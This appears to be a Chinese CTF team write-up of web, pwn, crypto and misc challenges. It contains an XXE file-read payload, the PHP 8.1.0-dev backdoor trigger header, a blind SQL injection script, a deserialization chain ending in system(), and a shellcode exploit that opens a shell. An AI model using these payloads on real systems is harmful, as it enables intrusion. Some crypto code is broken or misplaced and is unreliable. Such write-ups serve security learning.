Future战队WriteUp

• 战队信息

战队名称：Future战队

战队排名：17

• 解题情况

题目名称	解出情况
PHP的XXE	解出
PHP的后门	解出
EasyMD5	解出
Easy_SQLi	解出
雏形系统	解出
xinxiangoa	未解出
来打CS咯	未解出
简单的数学题	解出
Easy_Shellcode	解出
解个方程	解出
ez_log	解出
ezrsa	解出
factor1	解出
四重加密	解出
CTFer Revenge	解出
追光者	未解出
多情	未解出
小光的答案之书	解出
ez_model	解出
调查问卷	解出

• 解题过程

Web方向

PHP的XXE解题步骤：

第一步，启动题目环境…

题目提示是xxe题目

解题脚本：

*注：如该题使用自己编写的脚本代码请详细写出，不允许截图

<!DOCTYPE xxe[

<!ELEMENT test ANY >

<!ENTITY xxe SYSTEM "file:///flag" >]>

<test>

<name>&xxe;</name>

</test>

PHP的后门解题步骤：

Php版本是8.0

PHP 8.1.0-dev后门复现

User-Agentt: zerodiumsystem("id");

EasyMD5的解题步骤：

题目是进去上传两个文件，没扫目录，直接猜测是否是MD5碰撞

找办法生成两个MD5相同的文件，然后文件大小要控制，后缀改为pdf，里面尝试写入一句话木马。

Easy_SQLi的解题步骤

一个sql注入题目，尝试使用二分查找，但只能爆出表名和列名，值一直出不来，后来采用布尔盲注，fuzz测试后发现没有加任何过滤，直接写脚本

import time
import requests

url = 'http://challenge.qsnctf.com:30151/login.php'

name = ""
for i in range(50):
   for j in range(31, 129):
       payload = f"1'^if(ascii(substr((select/**/group_concat(password)/**/from/**/users),{i}," \
                 f"1))={j},1,0)-- -"
       data={
           'uname':payload
       }
       # 'case(ord(substr(database()from({})for(1))))when({})then(2)else(3)end'
       result = requests.post(url=url,data=data)
       if 'success' in result.text:
           name += chr(j)
           print('数据: %s' % name)
           print(url + payload.format(i, j))
           break
       else:
           continue

雏形系统的解题步骤：

一道php代码混淆题目，现需要理清逻辑顺序，把每个变量提取出来，再利用统一替换

最后得到清晰易懂代码

<?php

    $O00OO0='n1zb/ma5\vt0i28-pxuqy*6lrkdg9_ehcswo4+f37j';

    $O00O0O=$O00OO0[3].$O00OO0[6].$O00OO0[33].$O00OO0[30];

    $O0OO00=$O00OO0[33].$O00OO0[10].$O00OO0[24].$O00OO0[10].$O00OO0[24];

    $OO0O00=$O0OO00[0].$O00OO0[18].$O00OO0[3].$O0OO00[0].$O0OO00[1].$O00OO0[24];

    $OO0000=$O00OO0[7].$O00OO0[13];$O00O0O.=$O00OO0[22].$O00OO0[36].$O00OO0[29].$O00OO0[26].$O00OO0[30].$O00OO0[32].$O00OO0[35].$O00OO0[26].$O00OO0[30];

    $O0O000="KXpJtRrgqUOHcFewyoPSWnCbvkfMIdmxzsELYZBVGhDNuaATlQjiTaMhyQJUrZntqeKBsNwRckmlodVASYpWxjLEbIfCgvOFuizDPGXHwO9BitzTSmzUSgCsqp9sa3hPqg9sYgPuIsUBTDjTmHzUSmfXlgexqsfxigdTSmzUStjTSmzUSmzUSmfBYchjicAUhg5PKtG7mHzUSmzUSmzUqtCHlgPXSmQBbaFxnBNUSmzUSmzUStf1bpWMbsfpYc5XYgPolHfVa3QoZ3Qsic5kTmP7mHzUSmzUSmzUSmzUSmQ0igPxED5uIav0nXMGDeNNhtQNiaAywkfvq3AMnBNUSmzUSmzUSt0TSmzUSt0TSmzUSgFjbaFxStYomHzUSmf7mHzUSmzUSmzUqtCHlgPXSmQxIaU7mHzUSmzUSmzUqtCHlgPXSmQvI2Z7mHzUSmzUSmzUqtCHlgPXSmQMlkQPlkQMl247mHzUSmzUSmzUqtCHlgPXSgI1lpF0ic9uSe9VIgCxYth1b3GNTajTSmzUSmzUSmzUSmzUIcFNlszHRgdUCth5StFPqpPvlgP6IRfFIRLHnBNUSmzUSmzUSmzUSmzdYgvMqs0+ic5xqgCXYmUMnBNUSmzUSmzUSt0TSmzUSmzUSmfpYc5XYgPolHfMlkFBIcF0TmP7mHzUSmzUSmzUSmzUSgPpTmQ0igPxED5xIaU9wRYHl3dkhHbdYgvMqs0+bcYPwD0kIcPkitQPIc4kTGNUSmzUSmzUSmzUSmf7mHzUSmzUSmzUSmzUSmzUSmfPb2voSmQ0igPxED5MlkQPlkQMl247mHzUSmzUSmzUSmzUSt0TSmzUSmzUSmzUSmzUIcFNlszH8h+IvDL45lTf8h+SjHS7mHzUSmzUSmzUVGNUSmzUVGNTSmzUSgFjbaFxSLQPlc8TSmzUStjTSmzUSmzUSmfBYchjicAUhgL7mHzUSmzUSmzUq3QvYgPXSgI1lpF0ic9uSe9Vb2ejleF0baQMbsUdbcF0ic9uEmzdIg8MmHzUSmzUSmzUKBNUSmzUSmzUSmzUSmfklg9HbcBUhgS7mHzUSmzUSmzUSmzUSmQHTmQdl1jBaRd7mHzUSmzUSmzUVGNUSmzUVGNTSmzUSmQHSO0Uhe9GD1FZcsYBbaFxY29sImYYnBNUSmzUhgLUwRzda1fwZ1Qlh3CxIahubc1Ph107mHzUSmfzYc5xIahMbcWMKpZNhgLMnBNUSmzUicbUTmeMq3FPYmUdbHdMStjTSmzUSmzUSmfPb2voSmS9wD09wD09wD09wD09wD09wD1GDeNURc5BYaGUcc91qHfnbc1PSD09wD09wD09wD09wD09wD09wRS7mHzUSmf9mHzUSmfMIHUdbD09h2edlcPuhsbphgS9wRSkixepYcv1h3AUYgCxYmfdIc1oSHdTSmzUStjTSmzUSmzUSmfPb2voTmEkploPoIapHhOPHM8HTDjTSmzUSt0TmHzUSmz/wU==";  

    echo($O00O0O($O0OO00($OO0O00($O0O000,$OO0000*2),$OO0O00($O0O000,$OO0000,$OO0000),$OO0O00($O0O000,0,$OO0000))));

再得到代码源码进行pop链条构造

<

?php

    error_reporting(0);



    class shi

    {

        public $next;

        public $pass;

        public function __toString(){

            echo "suce2";

            $this->next::PLZ($this->pass);

        }

    }

    class wo

    {

        public $sex;

        public $age;

        public $intention;

        public function __destruct(){

            echo "Hi Try serialize Me!";

            $this->inspect();

        }

        function inspect(){

            if($this->sex=='boy'&&$this->age=='eighteen')

            {

                echo $this->intention;

            }

            echo "���18岁���";

        }

    }



    class Demo

    {

        public $a;

        static function __callStatic($action, $do)

        {

            echo "123";

            global $b;

            $b($do[0]);

        }

    }

$a=new wo();

$a->sex='boy';

$a->age='eighteen';

$a->intention=new shi();

$a->intention->next=new Demo;

$a->intention->pass="ls";

echo serialize($a);

   

然后这里还要用到global知识点，因为刚好username的变量名是$b,进行赋值给system。

构造成功

Pwn方向

简单的数学题解题步骤：

第一步，nc连接

第二步，计算

第一题：方程是 (2 \times 15^2 - \frac{1}{x} + 15 - 6 = 458.875)，我们可以对其进行简化：

[2 \times 15^2 - \frac{1}{x} + 9 = 458.875]



[2 \times 225 - \frac{1}{x} = 449.875]



[450 - \frac{1}{x} = 449.875]



[- \frac{1}{x} = -0.125]



[\frac{1}{x} = 0.125]



[x = \frac{1}{0.125}]



[x = 8]

因此，方程的解应该是 (x = 8)。

第二题：为了求解方程 （5 + sqrt{x} = 8），我们可以分离平方根项，然后求解 （x）。

从两边减去 5，我们得到：

（sqrt{x} = 3）

为了求解 （x），我们将等式的两边平方：

（（sqrt{x}）^2 = 3^2）

（x = 9）

因此，方程 （5 + sqrt{x} = 8） 的解为 （x = 9）。

第三题，有点难算，所以我直接用z3

解题脚本：

from z3 import *

# 创建一个解决器

solver = Solver()

# 创建一个整数变量

x = Int('x')

# 添加方程

solver.add(x**10 + 2**10 - 4*x == 6131066258749)

# 检查并获取解决方案

if solver.check() == sat:

    m = solver.model()

    print("The solution for x is:", m[x].as_long())

else:

    print("No solution found")

Easy_Shellcode解题步骤：

文件打开是一个print数组v4的地址和read函数，并且nx好像可写，输入长度可以利用，进行一个栈上写好自己的shell，然后在构造一个回到v4的地址，这样子就可以重新读取到写buf段上的shell，这里要注意shell的隔断用/00截断然后构造好栈上数据

from pwn import *

context(arch = 'amd64', os='linux',log_level = 'debug')

# 先连接到本地进程

#p = process('./12')

p = remote('challenge.qsnctf.com',30262)

# 从进程中接收地址

addr = p.recvline().strip()

addr = int(addr, 16)



# 构造 shellcode 或其他 payload

shellcode = asm(shellcraft.sh())

payload = shellcode.ljust(0x100, b'\x00') + p64(addr) + p64(addr)



# 发送 payload 到远程进程

p.sendline(payload)

# 交互式连接

p.interactive()

Crtpto方向

解个方程解题步骤：

网上套个脚本

# coding = utf-8

def computeD(fn, e):

    (x, y, r) = extendedGCD(fn, e)

    #y maybe < 0, so convert it

    if y < 0:

        return fn + y

    return y



def extendedGCD(a, b):

    #a*xi + b*yi = ri

    if b == 0:

        return (1, 0, a)

    #a*x1 + b*y1 = a

    x1 = 1

    y1 = 0

    #a*x2 + b*y2 = b

    x2 = 0

    y2 = 1

    while b != 0:

        q = a / b

        #ri = r(i-2) % r(i-1)

        r = a % b

        a = b

        b = r

        #xi = x(i-2) - q*x(i-1)

        x = x1 - q*x2

        x1 = x2

        x2 = x

        #yi = y(i-2) - q*y(i-1)

        y = y1 - q*y2

        y1 = y2

        y2 = y

    return(x1, y1, a)



    p = 99095810379991310121074917040445425147

    q = 334108028023768980062934979673701149071

    e = 65537

n = p * q

fn = (p - 1) * (q - 1)



d = computeD(fn, e)

print d

factor解题步骤：

```python

import gmpy2

import hashlib

from Crypto.Util.number import *



p = getPrime(512)

q = getPrime(512)

d = getPrime(256)

e = gmpy2.invert(d, (p**2 - 1) * (q**2 - 1))

flag = "qsnctf{" + hashlib.md5(str(p + q).encode()).hexdigest() + "}"

print(e)

print(p * q)

# 4602579741478096718172697218991734057017874575484294836043557658035277770732473025335441717904100009903832353915404911860888652406859201203199117870443451616457858224082143505393843596092945634675849883286107358454466242110831071552006337406116884147391687266536283395576632885877802269157970812862013700574069981471342712011889330292259696760297157958521276388120468220050600419562910879539594831789625596079773163447643235584124521162320450208920533174722239029506505492660271016917768383199286913178821124229554263149007237679675898370759082438533535303763664408320263258144488534391712835778283152436277295861859

# 78665180675705390001452176028555030916759695827388719494705803822699938653475348982551790040292552032924503104351703419136483078949363470430486531014134503794074329285351511023863461560882297331218446027873891885693166833003633460113924956936552466354566559741886902240131031116897293107970411780310764816053

```



$$

(p^2-1)(q^2-1)=(pq)^2-(p^2+q^2)+1\\

ed\equiv1\mod (p^2-1)(q^2-1)\\

ed-k*(p^2-1)(q^2-1)=1\\

(p^2-1)(q^2-1)>2d\\

\left|\frac{e}{(p^2-1)(q^2-1)}-\frac{k}{d}\right|=\frac{1}{(p^2-1)(q^2-1)*d}<\frac{1}{2d^2}

$$



用`wiener`恢复出`k,d`，$(p^2-1)(q^2-1)$与$p^2q^2$相差$p^2+q^2-1$，相应数量级位`2046`和`1025`，故可忽略不计，将其用$p^2q^2$进行连分数渐进

$$

p^2+q^2=(pq)^2-(p^2-1)(q^2-1)+1\\

p+q=\sqrt{p^2+q^2+2pq}\\

p-q=\sqrt{p^2+q^2-2pq}

$$

在`sage`中有`two_squares`函数，可以暴力算$p^2+q^2$的形式，但本题数据有点大，没有跑出来。



```python

from Crypto.Util.number import *

from gmpy2 import iroot

import hashlib

e = 4602579741478096718172697218991734057017874575484294836043557658035277770732473025335441717904100009903832353915404911860888652406859201203199117870443451616457858224082143505393843596092945634675849883286107358454466242110831071552006337406116884147391687266536283395576632885877802269157970812862013700574069981471342712011889330292259696760297157958521276388120468220050600419562910879539594831789625596079773163447643235584124521162320450208920533174722239029506505492660271016917768383199286913178821124229554263149007237679675898370759082438533535303763664408320263258144488534391712835778283152436277295861859

pq = 78665180675705390001452176028555030916759695827388719494705803822699938653475348982551790040292552032924503104351703419136483078949363470430486531014134503794074329285351511023863461560882297331218446027873891885693166833003633460113924956936552466354566559741886902240131031116897293107970411780310764816053

pqx = pq ^ 2

fra = (e/pqx).continued_fraction()

for i in range(1, len(fra)):

    k, d = fra.numerator(i), fra.denominator(i)

    if (e*d - 1) % k == 0 and d > 2^250:

        print(k, d)

        break

temp = (e*d - 1) // k

pq_square = pqx - temp + 1

p_q = iroot(pq_square - 2*pq, 2)[0]

p__q = iroot(pq_square + 2*pq, 2)[0]

q = (p_q + p__q) // 2

p = pq // q

flag = "qsnctf{" + hashlib.md5(str(p + q).encode()).hexdigest() + "}"

print(flag)

```





```

f = open('what.txt').read().split('\n')[::-1]

fs = open('what.zip', 'wb')

for i in f:

# print(f[0].split())

    temp = ''.join((i.split())[1:-1])[::-1]

    if len(temp) < 32:

        fs.write(bytes.fromhex(temp))

    else:

        fs.write(bytes.fromhex(temp[:32]))

```

ez_log解题步骤：

第一步：题目中直接pow加密，直接写脚本用discrete_log解密

解题脚本：

from Crypto.Util.number import long_to_bytes

from sympy.ntheory.residue_ntheory import discrete_log



p = 3006156660704242356836102321001016782090189571028526298055526061772989406357037170723984497344618257575827271367883545096587962708266010793826346841303043716776726799898939374985320242033037

g = 3

c = 2822383809957166013655160067344878219207837876741318271255368759401838438375012213174648927846583373689939957584637745891654118569611912259950543050017849134166507634976176079000271900083463



m = discrete_log(p, c, g)  #pow反解

print(f'm = {m}')

print(long_to_bytes(m))



#m = 129834262663159540028897405

#b'key{lbQCmx}'

Easyrsa

```python

from Crypto.Util.number import *

flag = b'qsnctf{xxx-xxxx-xxxx-xxxx-xxxxxxxxx}'

m = bytes_to_long(flag)

p = getPrime(512)

q = getPrime(512)

r = getPrime(512)

n = p * q * r

leak = p * q

e = 0x10001

c = pow(m, e, n)

print(f'c = {c}')

print(f'n = {n}')

print(f'leak = {leak}')

# c = 173595148273920891298949441727054328036798235134009407863895058729356993814829340513336567479145746034781201823694596731886346933549577879568197521436900228804336056005940048086898794965549472641334237175801757569154295743915744875800647234151498117718087319013271748204766997008772782882813572814296213516343420236873651060868227487925491016675461540894535563805130406391144077296854410932791530755245514034242725719196949258860635915202993968073392778882692892

# n = 1396260492498511956349135417172451037537784979103780135274615061278987700332528182553755818089525730969834188061440258058608031560916760566772742776224528590152873339613356858551518007022519033843622680128062108378429621960808412913676262141139805667510615660359775475558729686515755127570976326233255349428771437052206564497930971797497510539724340471032433502724390526210100979700467607197448780324427953582222885828678441579349835574787605145514115368144031247

# leak = 152254254502019783796170793516692965417859793325424454902983763285830332059600151137162944897787532369961875766745853731769162511788354655291037150251085942093411304833287510644995339391240164033052417935316876168953838783742499485868268986832640692657031861629721225482114382472324320636566226653243762620647

```

明文长度很可能小于`512bit`，正常`flag`不做填充处理大概在`400bit`以下，`44`个明文字符转换后对应`351bit`，根据所选字符不同可能有`1bit`误差，`512bit`大概需要`64`个明文字符。

exp



```python

from Crypto.Util.number import *

c = 173595148273920891298949441727054328036798235134009407863895058729356993814829340513336567479145746034781201823694596731886346933549577879568197521436900228804336056005940048086898794965549472641334237175801757569154295743915744875800647234151498117718087319013271748204766997008772782882813572814296213516343420236873651060868227487925491016675461540894535563805130406391144077296854410932791530755245514034242725719196949258860635915202993968073392778882692892

n = 1396260492498511956349135417172451037537784979103780135274615061278987700332528182553755818089525730969834188061440258058608031560916760566772742776224528590152873339613356858551518007022519033843622680128062108378429621960808412913676262141139805667510615660359775475558729686515755127570976326233255349428771437052206564497930971797497510539724340471032433502724390526210100979700467607197448780324427953582222885828678441579349835574787605145514115368144031247

pq = 152254254502019783796170793516692965417859793325424454902983763285830332059600151137162944897787532369961875766745853731769162511788354655291037150251085942093411304833287510644995339391240164033052417935316876168953838783742499485868268986832640692657031861629721225482114382472324320636566226653243762620647

e = 65537

r = n // pq

print(long_to_bytes(pow(c, inverse(e, r - 1), r)))

```

四重加密解题步骤：

第一步：发现压缩包需要密码，在注释里找到密码

解密得到密码

第二步：打开文档发现又是密码再次解码

第三步：猜测是维吉尼亚密码，第三次解码

第四步：凯撒加密解码

解题脚本：

Misc方向

ez_model解题步骤：

第一步：查找资料，发现pth文件是训练好的ai模型

第二步：python脚本提取有用信息

第三步：将上面的转成char类型

LidUJ3fQM2FVJoxpDwLvDyF3DwpPdwxOEgbQJoxnEgdnJgnojoZ5mF

ZzYyXxAaBbCcDdEeFfGgHhIiJjKkLlMmNnOoPpQqRrSsTtUuVvWw0123456789+/

第四步：base64解码

解题脚本：

import torch # 命令行是逐行立即执行的

content = torch.load(r"C:\Users\ASUS\Documents\WeChat Files\wxid_pqlqm88ydntu22\FileStorage\File\2024-03\easy.pth")

print(content.keys()) # keys()

# 之后有其他需求比如要看 key 为 model 的内容有啥

print(content['flag'])

print(content['hint'])

CTFer Revenge解题步骤：

第一步：根据题目名字和附件看出是行列都倒转的压缩包文件

第二步：python脚本，将行列倒转并取中间的hex段，然后直接生成zip文件

第三步：得到提示密码为小写字母和数字，进行爆破，爆破出密码是z12345

第四步：

肉眼识别flag

解题脚本：

f = open(r"C:\Users\ASUS\Desktop\m1.txt").read().split('\n')[::-1]
fs = open(r"C:\Users\ASUS\Desktop\m1.zip", 'wb')
for i in f:
# print(f[0].split())
    temp = ''.join((i.split())[1:-1])[::-1]
    if len(temp) < 32:
        fs.write(bytes.fromhex(temp))
    else:
        fs.write(bytes.fromhex(temp[:32]))

小光的答案之书

猪圈密码图片,密码是life.